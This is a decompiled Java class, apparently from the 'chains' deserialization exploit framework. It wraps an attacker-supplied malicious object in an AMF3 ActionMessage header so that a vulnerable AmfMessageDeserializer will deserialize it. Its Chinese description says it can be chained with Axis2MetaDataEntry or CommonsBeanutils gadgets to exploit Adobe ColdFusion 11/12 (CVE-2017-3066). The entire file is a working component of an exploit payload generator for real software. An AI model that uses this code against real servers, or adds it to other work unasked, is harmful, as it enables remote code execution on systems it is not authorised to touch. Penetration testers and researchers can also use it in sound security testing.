package com.ar3h.chains.core.payload.impl.amf;

import com.ar3h.chains.common.Payload;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.PayloadAnnotation;
import com.ar3h.chains.common.enums.Authors;
import flex.messaging.io.SerializationContext;
import flex.messaging.io.amf.ActionContext;
import flex.messaging.io.amf.ActionMessage;
import flex.messaging.io.amf.AmfMessageDeserializer;
import flex.messaging.io.amf.AmfMessageSerializer;
import flex.messaging.io.amf.AmfTrace;
import flex.messaging.io.amf.MessageHeader;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

@PayloadAnnotation(name = "AmfMessageSerializer AMF3", description = "使用 AmfMessageSerializer (AMF3 版本) 对恶意对象进行序列化, 返回字节流\n使用 AmfMessageDeserializer 反序列化\neg1: 可配合 Axis2MetaDataEntry(RevisionID=2)/CB1.8版本, 可实现 Adobe Coldfusion 11/12 反序列化漏洞利用 (CVE-2017-3066)", gadgetTags = {Tag.AmfDeserialize}, authors = {Authors.MBECHLER})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/core/payload/impl/amf/BlazeDSAMF3AMPayload.class */
public class BlazeDSAMF3AMPayload implements Payload<byte[], Object> {
    private static final Logger log = LoggerFactory.getLogger((Class<?>) BlazeDSAMF3AMPayload.class);

    /* JADX WARN: Can't rename method to resolve collision */
    @Override // com.ar3h.chains.common.Payload
    public byte[] marshal(Object obj) throws Exception {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        SerializationContext serializationContext = new SerializationContext();
        AmfMessageSerializer amfMessageSerializer = new AmfMessageSerializer();
        amfMessageSerializer.initialize(serializationContext, byteArrayOutputStream, new AmfTrace());
        ActionMessage actionMessage = new ActionMessage(3);
        actionMessage.addHeader(new MessageHeader("payl", false, obj));
        amfMessageSerializer.writeMessage(actionMessage);
        return byteArrayOutputStream.toByteArray();
    }

    @Override // com.ar3h.chains.common.Payload
    public Object unmarshal(byte[] bArr) throws Exception {
        SerializationContext serializationContext = new SerializationContext();
        AmfMessageDeserializer amfMessageDeserializer = new AmfMessageDeserializer();
        amfMessageDeserializer.initialize(serializationContext, new ByteArrayInputStream(bArr), new AmfTrace());
        ActionMessage actionMessage = new ActionMessage(3);
        amfMessageDeserializer.readMessage(actionMessage, new ActionContext());
        return actionMessage.getHeader(0);
    }
}
